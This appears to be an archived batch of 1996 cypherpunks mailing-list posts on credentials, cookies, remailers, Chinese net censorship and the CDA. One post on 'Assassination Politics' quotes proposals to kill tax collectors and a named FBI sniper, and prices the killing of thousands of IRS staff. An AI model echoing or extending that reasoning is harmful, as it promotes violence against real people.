**** NEW PGP 2.6.2 KEY *********

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Fri, 16 Feb 1996 05:05:21 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: anonymous age credentials, sharing of
In-Reply-To: <Pine.SUN.3.91.960214143233.28807O-100000@viper.law.miami.edu>
Message-ID: <Pine.A32.3.91.960215110839.17030H-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Michael Froomkin wrote:

> Suppose Alice is a CA who issues anonymous age credentials.
> Bob is 15
> Carol is 25
[...]
> What can stop Bob and Carol from subverting a scheme that relies on 
> anonymous age creditials in this manner?

Transfer of credentials is a big problem in terms of computer based 
authentication.

Authentication is traditionally carried out in one of three forms:

*	Authentication by knowledge(passwords)
*	Authentication by posession(key cards)
*	Authentication by being(biometrics)

With the first two, which are overwhelmingly popular and cheap, the 
transfer of credentials is trivial.

Even if they're not anonymous credentials, the fact that I can hand 
someone my driver's licence to swipe through a card reader next to a 
machine is a simple example of transfer of credentials problem.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 16 Feb 1996 11:48:54 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: True democracy the electronic way
In-Reply-To: <ad480f2b0f02100420ba@[205.199.118.202]>
Message-ID: <199602151940.LAA04320@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>1. this is an extremely interesting problem in my opinion. the ideal
>>form of government has not been achieved in many millenia. could it
>>be solved given the full power of the information age, i.e.
>...
>>if anyone knows of
>>a mailing list to discuss this concept of trying to apply technology
>>to government, I would be most interested. the closest I can see
>
>
>You might try the "Cypherwonks" mailing list that L. Detweiler set up a
>couple of years ago to explore the very ideas you are supporting here. You
>might find you have a lot in common with him.
>

interesting you should mention that. because of my interests
I've heard various legends that this list (long ago in a galaxy far away)
was sabotaged by piles of trash sent
through anonymous remailers, and the moderator quit instead of put
up with it (not provided the tools to keep out mail from unsubscribers). 
perhaps a little data point about forms of information
technology (and the absence of it) that *doesn't* necessarily lead 
to an improved form of human interaction. 

apparently there is some pretty harsh antagonism towards "electronic
democracy" among the people best suited to experiment with it, i.e.
the pioneers of cyberspace. but hell, alienation and nihilism is
so much more convenient and versatile than bubbly enthusiasm. 
it's a one-size-fits-all philosophy. "screw everyone!!!"  "it'll never
work!!!"  "government == tyranny!!"

something tells me that "electronic democracy" is going to survive
the death of an early mailing list dedicated to its discussion, however.

but thanks very much for the pointer,  Klaus! I'm always impressed with
the helpful spirit of everyone on this list.

(speaking of which I'd be interested in talking to anyone with spare 
resources to start mailing lists.)

--Vlad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rsc.anu.edu.au>
Date: Thu, 15 Feb 1996 16:52:49 +0800
To: cypherpunks@toad.com
Subject: A good cryptanalysis text?
Message-ID: <9602150103.AA22683@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Hi all
> 
> A friend of mine is looking for a good introductory cryptanalysis
> text. Does Schneier's book cover this in much depth or is it more
> cryptography as the name implies.
> 
> My friend is a computer networking admin who is trying to widen
> his background knowledge of security related issues (this may
> mean that a more computing oriented intro is more suitable).
> 
> Thanks in advance for any suggestions.
> 
> Sherry
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 16 Feb 1996 06:34:00 +0800
To: cypherpunks@toad.com
Subject: DES_ono
Message-ID: <199602151707.MAA24559@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Citing the crypto-expert BSA study noted here by Matt
   Blaze, Computerworld of 2-12-96:

   "Standard Encryption Vulnerable To Attack. Banking's most
   trusted technique for funds transfer questioned."

   It reports on puny crypto and DES desperation, with an "Oh,
   no, please" by the ABA.


   DES_ono



   [Thanks to BC]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Fri, 16 Feb 1996 11:36:19 +0800
To: lwp@conch.aa.msen.com
Subject: Re: Using lasers to communicate
Message-ID: <9602152017.AA17834@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM 2/14/96 -0500, you wrote:
>This idea of sending data via laser beams across open spaces has some
>very useful potential.  ...

>Eavesdropping and channel-blocking and physical-location-discovery are 
>related threats to which most traditional data channels are susceptible.  
>Any link which depends on a physical conduit (phone line, fiber, coax)
>is relatively easy to interrupt and to trace to its end points.
>RF links, even with frequency hopping, are subject to triangulation and
>jamming.  All these kinds of links can be eavesdropped.

>Point-to-point conduitless laser signalling, as envisioned by "Bill" and
>Tim in their quotes below, eliminates or reduces these threats

Dust will cause diffraction of the beam (at a reduced intensity, of course).  
Near the source, a detector tuned narrowly to the wavelength of interest would 
probably succeed quickly.  If you have a line of sight channel, there are 
many other ways to signal that will preserve some deniability.


Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Fri, 16 Feb 1996 06:33:57 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Some thoughts on the Chinese Net
Message-ID: <v02140b0bad491b46cf8f@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


>The more complex portion (from my perspective, at any rate) is a
>modification of the standard TCP/IP protocol, requiring that each packet
>be signed by its originating user.

That's the killer.  Signatures take a huge amount of CPU time.  Signing
each packet is not going to be cost effective.

However, they could have an authenticated key exchange and then symmetric-
encrypt each TCP/IP connection.  That can perform -- and has the nice
side effect [from the Chinese POV] of depriving the NSA of Chinese civilian
net intelligence.  As long as the key exchange is signed, everything
travelling using that key is authenticated implicitly.

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 16 Feb 1996 06:41:21 +0800
To: Carl Ellison <cme@cybercash.com>
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <v02140b0bad491b46cf8f@[204.254.34.231]>
Message-ID: <Pine.SUN.3.91.960215122741.4852B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Feb 1996, Carl Ellison wrote:

> >The more complex portion (from my perspective, at any rate) is a
> >modification of the standard TCP/IP protocol, requiring that each packet
> >be signed by its originating user.
> 
> That's the killer.  Signatures take a huge amount of CPU time.  Signing
> each packet is not going to be cost effective.

Yep; this has been pointed out to me already. On this point I concur. 

> However, they could have an authenticated key exchange and then symmetric-
> encrypt each TCP/IP connection.  That can perform -- and has the nice
> side effect [from the Chinese POV] of depriving the NSA of Chinese civilian
> net intelligence.  As long as the key exchange is signed, everything
> travelling using that key is authenticated implicitly.

How would packets coming into the country be marked / passed on?

So it seems that, in general, the Chinese supression of the net is 
possible. A frightening thought. Or, if you think about potential 
implications 10 yrs down the road here, a sobering thought.

Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Isaac Hopkins <Isaac.C.Hopkins-1@tc.umn.edu>
Date: Fri, 16 Feb 1996 20:29:52 +0800
To: cypherpunks@toad.com
Subject: True democracy in America.
Message-ID: <31237dbc235a002@mhub1.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>
>}Is ok. I suspect that we are narrowing on a similar position. Would like
>}to see a time when net communications make "representatives of the people"
>}obsolete" since majority voting on any issue can be "anytime,anywhere".
>}Doubt that it will happen soon.
>
><rm>
>
>I too would like to see a purely democratic process rather than a
>representative one.  And I also agree that it won't happen soon.  The
>question is, what do we keep of govt?
>
A truly Democratic society is only feasible when you have an educated
society that can act outside of their own self interest.  Take a look at the
ancient greeks,  they voted to put socrates to death because he questioned
their power and beliefs.  In a democratic society you must be accepted by
the majority in order to survive.  Think about all of the greatest minds in
history, most of them were very controversial.  A democracy is just the
tyranny of the majority.  I think that Americans are typically smart enough
to have more of a say in politics and believe that we should move to become
more democratic, but not to go so far as to become a real democracy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 16 Feb 1996 11:31:52 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Netscrape's Cookies
Message-ID: <v02120d02ad4940f4e7f8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:34 2/14/96, Alex Strasheim wrote:
>> >>I'm curious if anyone knows which sites use/modify it.
>> >AFAIK, the only site that uses it is *.netscape.com
>>
>> That is not quite true.  There are other sites that use the cookies.  (It is
>> not very common though...)
>
>A good place to read about cookies is http://www.illuminatus.com/cookie;
>I think there are pointers to cgi/perl stuff that manipulates them.
>
>Cookies are very helpful for database and commerce applications.  I'm
>using them for a crude online store, as a way to let the web server keep
>track of who has what in their shopping basket.

Cookies are a godsend for shopping baskets. Saving state without them is a
major pain.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Fri, 16 Feb 1996 07:03:24 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Some thoughts on the Chinese Net
Message-ID: <v02140b02ad492449ed75@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 2/15/96, Jon Lasser wrote:
>How would packets coming into the country be marked / passed on?

Presumably, you'd need a Chinese-approved identity key in order to get
packets into the country.

>So it seems that, in general, the Chinese supression of the net is
>possible. A frightening thought. Or, if you think about potential
>implications 10 yrs down the road here, a sobering thought.

Hold on..

Assuming we really believe the net is a good thing, if the Chinese block
it, they're hurting themselves.  We don't need to get bent out of shape.
They could as easily refuse to connect to the rest of the world.

The more they repress their population, the more their population will
want to rise up in protest -- maybe not this millenium but probably in
the next.

All we have to be sure of is that we don't let the Chinese dictate to us
what content we can provide.  It's like the CDA.  The Chinese might choose to
implement a nation-wide SurfWatch at all connection points at its borders.

...their problem, IMHO....


+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Fri, 16 Feb 1996 08:38:25 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Carrying the Bible an Offense?
In-Reply-To: <ad47f4eb0e021004f610@[205.199.118.202]>
Message-ID: <199602151924.NAA24235@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) said:

TCM> There are two further points which need clearing up:

TCM> 1. Private citizens (the atheist in this case) do not file
TCM> criminal charges. They may swear out a complaint ("I witnessed
TCM> John Doe carrying a Bible"), but they do not file criminal
TCM> charges.

	OK, how about `press charges`?  And please, don't try telling
me that private citizen's don't `press charges`, because one of the
well reported problems in fighting domestic violence has been the
battered spouse (almost always the wife) refusing to press charges.

TCM> 2. The "carrying of a Bible" is not covered by the CDA.

	You are the only one who has suggested that it is.  I have
suggested that portions of the Bible are 'indecent', and that
electronic transmissions of the same would fall under the CDA ban.

TCM> No prosecutor can be "forced" to prosecute, absent approval by a
TCM> grand jury. (And if a prosecutor doesn't want to indict a ham
TCM> sandwich, it won't be indicted.)

	OK, how about this.  J Random Atheist, Jr, comes across the
Bible on the 'net.  J Random Atheist, Sr, finds out, and is appalled,
and swears out a complaint.  The AUSA refuses to investigate.  Could J
Random Atheist, Sr, file a lawsuit against the AUSA because he is
being denied equal treatment under the law?

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 16 Feb 1996 01:50:04 +0800
To: cypherpunks@toad.com
Subject: National Cryptologic Museum (Noise)
Message-ID: <199602151257.NAA19309@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I peeled this off of Usenet, Wondering if this is Tim doing a little trolling?

Cheers!

The Christmas Troll

--(fwd)--

Hi all,

If you've never heard of the National Cryptologic Museum and have an
interest in this kind of stuff, you MUST go take a look.  It's at Fort
Meade, outside Laurel, Maryland, and actually lies on the grounds of the
NSA. I dropped by the other day and was very impressed.  The NSA is to be
grudgingly %^) commended, although the material on recent operations
(post-1950) is understandably a little thin.

The very coolest exhibit is a functioning Enigma machine on which visitors
are allowed to encrypt/decrypt messages. It really does work well, and I
got the same gloating thrill I felt the first time I decrypted a PGP
message from a friend. There is also a piece of Gary Powers' U2, a Cray
X-MP processor that you can sit on and peer into, several specimens of old
Japanese crypto machines, and incontrovertible proof of the Rosenbergs'
perfidy and treason, among many other interesting displays.  

The staff is friendly and informative, but you will not get the current
key codes for ICBM launch control out of them, of course. I did not see
any mention of PGP or related topics in my brief visit, either. Oh, and
most surreal was the entrance: at the end of the road, an almost unmarked
gate a yard wide in a razor wire fence, dangling a padlock.  I wondered
for a moment if it were the right place and if I would be shot if I
actually went inside.

Allow half a day if you are a serious student of these topics, and an hour
or two if not. All in all, it was the second most interesting museum I saw
in Washington (after Air & Space). I still don't trust Clipper, but it was
certainly nice to see the human side of the big bad spooky NSA. They have
done an important job for the country and don't deserve most of the abuse
that I see heaped on them on the Internet.

--ccm

Christopher C. May, M.D.
Univ. of Texas Health Sci. Ctr. ‹ San Antonio
may@uthscsa.edu  *  72707.413@compuserve.com
"Too much Law; not enough Order."



--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 16 Feb 1996 17:41:31 +0800
To: Deranged Mutant <cypherpunks@toad.com
Subject: Re: NETSCAPE IS "IN MERGER TALKS WITH AMERICA ONLINE"
Message-ID: <199602152214.OAA27564@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
>... He noted that new data showed that 40% of US
>Internet traffic was flowing through America OnLine's network and that
>together with Netscape the two companies would effectively  control the
>technology now shaping the global network - "And then Microsoft would be
>left without an Internet standard,".

Perry sent me a polite note asking why I had posted the original post, and
I replied:

>(1) I thought it was of interest to people on the list, and not yet generally
>available information.
...
>(3) It speaks to the issue of whether there is a danger of oligopolistic
>control of the net.  Cypherpunks will, of course, work on technical solutions
>to that danger.

He suggested that in the future I make it clear why I think my posts are
relevent to the subject of the list.


At  7:44 PM 2/13/96 -0500, Deranged Mutant wrote:
>I dunno. The World Wide Web Consortium supposedly exists to prevent 
>corporations from controlling the technology and standards.

I agree that keeping the cost of market entry low, by having the technical
standards freely available at no cost is an excellent way of furthering
this goal.  (The IETF has a similar policy.)  In addition, free software
(in the sense of the Free Software Foundation) will help.

BTW - I do not consider oligopolistic control of the net of the net to be a
serious danger in the five year time frame.  I am less sanguine about the
30 year time frame.

Bill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 16 Feb 1996 10:28:40 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Assassination Politics(tm) was V-chips, CC, and Motorcycle Helmets
Message-ID: <199602152215.OAA27592@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[I've changed the Subject: to more accurately reflect the contents]

My purpose on this thread is to examine the limits of Jim Bell's idea of
Assassination Politics.  My ground rules are to assume that it is a natural
outgrowth of the technologies of anonymous cash and anonymous remailers. 
As such arguments that it is immoral are only valid to the extent that they
bare on individual's decisions to particpate in an assassination.

I believe that we have general agreement that high government figures are
not subject to sanction via assassination politics because they already
enjoy Secret Service levels of protection.

I also believe that Jim and I disagree about the significance of Salmon
Rushdie.  Jim thinks that the lack of anonymity in the Mullah's
assassination bounty is repelling possible assassins.  I disagree.  A
question worth asking is, How much does it cost the British government to
protect Mr. Rushdie by keeping his location secret and providing other
unspecified protection.  If anyone knows the answer, it could help build an
economic model of Assassination Politics.

Jim Bell said:

>Actually, I think the primary targets will be either the middle level 
>manager types, or the ones who have attracted a substantial amount of bad 
>publicity by "following orders."  Lon Horiuchi (the sniper who shot Vicki 
>Weaver) for example, would be a excellent example of a person who'd try to 
>claim, "I was just following orders."  Okay, maybe he was, but so was Adolph 
>Eichmann.  

I agree that Jim's idea of targeting certain specific individuals, such as
the sniper above might work.


>Once the tax collectors/enforcers were targeted, the rest of the government 
>wouldn't be able to operate, and would collapse.

However if you tackle the whole tax system, you get into problems of scale.
 The IRS alone (according to their web page) has over 110,000 employees,
and we havn't even mentioned the state and local employees.  I don't think
killing one or two will have a sigificant effect (that is occuring now).  I
will assume that you have to successfully kill about 10% to have enough
effect to shut off the government's money supply.

Attacks at this scale will be difficult because while people will have
perfect anonymity in cyberspace, they won't enjoy it in physical space. 
Neighbors, survalence cameras, etc.; in fact all the technology that makes
privacy so hard to achieve today will be available to catch the assassins. 
The police will also be more motivated to utilize the technology for this
class of people than they would for drug dealers, pimps and other low
lifes.  These points will tend to raise the price of assassinations.

Let us assume that we can buy assassinations for $50,000 per person.  Times
11,000 people is $550 million dollars.  That is quite a sum.  I need to see
an analysis which shows how to raise money on this scale.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 17 Feb 1996 07:38:41 +0800
To: declan+@CMU.EDU
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
Message-ID: <01I18USFWHX0A0V2IC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 15-FEB-1996 01:33:25.17

>Since you don't understand the way Federal criminal charges work,
>there's no reason I should take your argument seriously. (Hint: The
>*U.S. Attorney*, or an AUSA, files charges, not you, me, or a random
>"athiest.")

	How about a lawsuit by the atheist against the site? Since the CDA
claims that such material is harmful, and tries to make it illegal, such a
lawsuit would appear to have grounds - especially if the atheist has a child
that is "surfing the Net." Now, they're unlikely to _win_, but the atheist
can cost them some money _and_ make the CDA look stupid. If I were in the
American Atheist Foundation or some such, I'd do such a lawsuit against a
Christian Right organization that had supported the CDA.
	Of course, the selective enforcement will be a good argument in favor
of the law being unconstitutional.
	Crypto relevance? Criminal laws aren't the only things that a
crypto-anarchial system will make less effective. Civil lawsuits (under things
like libel) also will be. I'd call this a good change.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 16 Feb 1996 08:40:31 +0800
To: cypherpunks@toad.com
Subject: Remailers Pose Risk
Message-ID: <199602151941.OAA09821@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Computerworld, February 12, 1996, Front page:

   Stealth E-mail poses corporate security risk

   By Gary H. Anthes


   Anonymous remailers on the Internet are emerging as a
   threat to national and corporate security, some experts
   warn.

   These remailers are Internet sites that strip the names and
   addresses from electronic-mail messages before passing them
   along anonymously to prople or newsgroups.

   For corporate information systems managers, stealth E-mail
   is especially troubling because it allows hackers to attack
   systems, steal trade secrets and broadcast them worldwide
   without leaving an audit trail for authorities to follow.

   "Anonymous remailers have a lot of nasty potential," said
   Stephen T. Kent, chief scientist for security technology at
   BBN Corp. in Cambridge, Mass. "They have the broadcast
   potential of the news media but without the possibility of
   recourse if something is unsubstantiated or defaming is
   published."

   Critics are calling for strict limits or an outright ban on
   remailer sites, but others insist they are a safeguard
   against electronic snooping by abusive governments and
   should be considered a political freedom.

   Anonymous remailers have been used in a variety of criminal
   acts, including distributing pornography and computer
   viruses, violating copyright laws and harassing people with
   nasty messages.

   One snowy day last month, for example, about 25% of the
   workforce at a defense contractor in Rockville, Md., went
   home after they received a bogus E-mail message dismissing
   them for the day. The message originated from an anonymous
   remailer that allowed the user to impersonate a senior
   company official.

   But there are more scary, less publicized uses of
   remailers, said Paul Strassmann, former director of defense
   information at the Pentagon. Stealth E-mail also is used
   extensively by Russian criminals, often former KGB agents.

   "This method of communication is a favorite for engaging
   the services of cyber-criminals and for authorizing payment
   for their acts through a third party." Strassmann said.

   Its Reputation Precedes It

   Perhaps the best-known remailer site is in Finland at
   anon.penet.fi.

   The Finnish server was used last year to publish
   confidential and copyrighted scriptures from the Church of
   Scientology. It also was used to reveal the secret source
   code used by RSA Data Security, Inc. in some of its
   encryption products.

   Last year, police raided the Finnish site and seized
   records and computer gear as part of an investigation of
   alleged copyright infringement.

   The administrator of anon.penet.fi offers this warning to
   new users: "I believe very firmly that it's not for me to
   dictate how other people ought to behave. But remember,
   anonymous postings are a privilege, and use them
   accordingly. Remember, this is a service that some people 
   who use newsgroups such as alt.sexual.abuse.recovery need.
   Please don't do anything stupid that would force me to
   close down the service."

   One remailer advertises itself as a way to thwart attempts
   by intelligence agencies to trace illegal traffic,
   Strassmann said. It holds all incoming messages until five
   minutes after the hour, then remails them in random order.
   The messages are sent through five to 20 other remailers,
   with a stop in at least one of the several countries noted
   for lax law enforcement, he said.

   Yet other experts say the threat from remailers is greatly
   exaggerated. "We've had remailers around for a while, and
   society hasn't fallen," said Mike Godwin, staff counsel at
   the Electronic Frontier Foundation in San Francisco. "We've
   had anonymous communication in the U.S. for years, you can
   use a public telephone, send a letter without a return
   address or engage in a cash transaction."

   Last year, the U.S. Supreme Court struck down an Ohio law
   that required the authors of political posters and
   pamphlets to identify themselves. "In the case of political
   speach, you can't make people tell you who they are," said
   Patrick Sullivan, executive director of the Computer Ethics
   Institute in Washington.

   But Sullivan said the police raid on the Finnish remailer
   was prompted by the Church of Scientology's legitimate
   complaint about violations of copyright law.

   "I haven't heard many uses of remailers that haven't
   involved, at the very least, being disrespective and, at
   the most, trying to cause harm of some sort." he said.

   _________________________________________________________

   Battle against remailers an unfair fight

   Think of anonymous remailers as enemies you can't fight
   face to face, says Paul Strassmann, former director of
   defense information at the Pentagon and now a lecturer at
   the U.S. Military Academy at West Point.

   "Anonymous remailers are here to stay," he said. "That
   means the old military paradigm of retaliation falls apart.
   The whole theory of warfare has been if someone attacks
   you, you can attack them. But when you are anonymous, there
   is no one to shoot at."

   Strassmann said society myst look for defenses in the
   health sciences, not among electronic technologies.

   "The history of public health teaches us that suppression
   of any disease must be preceded by a thorough understanding
   of its behavior, its method of transmission and how it
   creates its own ecology," he said.

   "As in the case of smallpox, yellow fever, flu epidemics,
   AIDS or malaria, it will take disasters before the public
   may accept that some forms of restrictions on the
   electronic freedom of speech and  that  privacy may be
   worthwhile."

   - Gary H. Anthes

   _________________________________________________________

   Do's and don'ts

   Unethical or illegal uses of anonymous remailers:

   -  To spread viruses or other malicious software
   -  To harass or commit libel
   -  To violate copyright laws
   -  To encourage others to commit unethical or illegal
      behavior

   Legitimate uses of anonymous remailers:

   -  For "whistle blowing"
   -  For political speech
   -  For encouraging frank but constructive exchanges of
      opinions

   _________________________________________________________

   Article also contained chart on how to use anon.penet.fi,
   not included here.

   [Thanks to BC for transcribing]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sat, 17 Feb 1996 07:36:02 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: news of the world (fwd)
Message-ID: <Pine.A32.3.91.960215144222.17030Q-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


  China orders Internet users to register



   BEIJING - In its latest move to control the flow of information, China
   on Wednesday ordered all those who use the Internet and other
   international computer networks to register with the police within 30
   days. China embarked on a broad crackdown on Internet users and other
   sources of information potentially harmful to government interests in
   December.

Oh well.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Fri, 16 Feb 1996 11:35:48 +0800
To: "'John Young'" <jya@pipeline.com>
Subject: RE: Cookie Crumbles
Message-ID: <01BAFBB4.C26F0250@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>What are the chances that NSCP might add a feature that would 
>allow customers to say yes or no at login to tracking their 
>movements at any site visited, with a friendly notice that 
>tracking analysis was being done?

The netscape browser could assert that tracking was not desired to it's
heart's content, but that doesn't prevent the server from tracking any 
state it wants about you.

(The typical non-cookie approach being to include a session identifier in all URLs)

regards,
- -Blake

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i

iQCVAwUBMSOODrmr67p11D8rAQHg8wP/fdjXkJFGuFCyCFr7oyP+z5B6a4S4RNd7
3nkzLVIhil6fHW78CKohGmjVPwuwiz81FGRobfsAoQKgUW0zCMI4SmI9Parxk63A
Ly5ckTVf+oDI6WWbyXg39xr7lMPKUqzfyzi3M7nDVXEPNZXLKH58+WJoR0eUsUyW
7AWwcEOducM=
=DGYR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 16 Feb 1996 09:30:08 +0800
To: Carl Ellison <cme@cybercash.com>
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <v02140b02ad492449ed75@[204.254.34.231]>
Message-ID: <Pine.SUN.3.91.960215144854.22649A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Feb 1996, Carl Ellison wrote:

> At 12:31 2/15/96, Jon Lasser wrote:
> >So it seems that, in general, the Chinese supression of the net is
> >possible. A frightening thought. Or, if you think about potential
> >implications 10 yrs down the road here, a sobering thought.
> 
> Hold on..
> 
> Assuming we really believe the net is a good thing, if the Chinese block
> it, they're hurting themselves.  We don't need to get bent out of shape.
> They could as easily refuse to connect to the rest of the world.
[...]
> All we have to be sure of is that we don't let the Chinese dictate to us
> what content we can provide.  It's like the CDA.  The Chinese might choose to
> implement a nation-wide SurfWatch at all connection points at its borders.
> 
> ...their problem, IMHO....

Not if it's just a proof-of-concept for US implementation of the same.

The US version might be ostensibly only "anti-indecency" or 
"anti-cryptography," but I'm betting that if the Chinese are successful, 
many other nations follow.

It's the naval blockade to JPB's Independant Cyberspace.  And I think JPB 
is... a little overoptimistic this time... but I still don't like the 
blockade.

Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Fri, 16 Feb 1996 17:49:42 +0800
To: "cypherpunks@toad.com>
Subject: RE: Some thoughts on the Chinese Net
Message-ID: <c=US%a=_%p=INTERGRAPH%l=HQ6960215151749NX004800@hq13.pcmail.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


Jon--

I would suggest that the Chinese solution to these problems is singular, 
and simple: the total inability to conduct any transaction anonymously.

My guess would instead be that the Chinese would register IP addresses to 
individuals. The precedent's been set already with registration of 
photocopiers, typewriters, and mimeograph machines. As Perry pointed out, 
RSA-signing each and every packet would be prohibitive. Assuming that their 
real interest is in controlling diffusion of information to and from the 
'net-- and not moderating what goes on in the Chinese intranet (or 
inter-intra-net, I guess) I think address registration would be a logical 
first step.

The simple portion is a national (Chinese) database associating true 
names with key IDs. These keys will be usable only to sign documents, not 
to encrypt information, similar to the Federal DSS.

If the binding is instead true name <-> IP address, then the censors drop, 
block, delay, or spoof packets from thoughtcriminals instead of refusing to 
sign them. This avoids both the signature overhead and the expenditure of 
hard currency on gwai lo.

Now that all information has a recognizable source, dissidents in China 
can be arrested, and unacceptable information never makes it into the 
country.

